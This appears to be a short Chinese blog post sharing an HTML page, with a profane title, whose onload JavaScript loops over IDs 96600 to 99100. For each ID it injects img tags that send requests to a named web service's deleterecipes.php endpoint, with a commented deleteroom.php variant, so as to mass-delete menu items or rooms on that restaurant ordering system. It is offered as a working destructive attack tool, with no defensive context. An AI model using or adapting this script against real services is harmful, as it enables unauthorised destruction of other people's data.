大批量删除农行点菜宝菜品品相和房间

<html>
<head>
<title> 全自动fuck农行碧池</title>
<!--
作者:landv
开发时间:2015年1月1日
功能:大批量删除农行点菜宝菜品品相和房间
-->
<script language="JavaScript">
window.onload = function(){
    for(var obj=96600;obj<=99100;obj++)
    {
        //obj为需要删除的菜品或房间ID值。区域盲删,获取准确ID比较浪费时间。
        //deleterecipes 删除菜品
        var istr="http://yidiandan.sinaapp.com/restaurant/content/resource/deleterecipes.php?id="+obj;
        //deleteroom 删除房间
        //var istr="http://yidiandan.sinaapp.com/restaurant/content/resource/deleteroom.php?id="+obj;
        //img 模式,不能够接受返回值,占用内存较少
        imgstr="<img id='img' height=2% width=3% src='"+istr+"'  /> ";
        //iframe 模式,此模式能接受返回值,比较占用内存。
        //imgstr="<iframe name='"+obj+"'height=2% width=3% src='"+istr+"'  />";
        document.write(imgstr);
    }
}
</script>
</head>
<body>
</body>
</html>

 

posted @ 2015-07-29 09:23  landv  阅读(353)  评论(0编辑  收藏  举报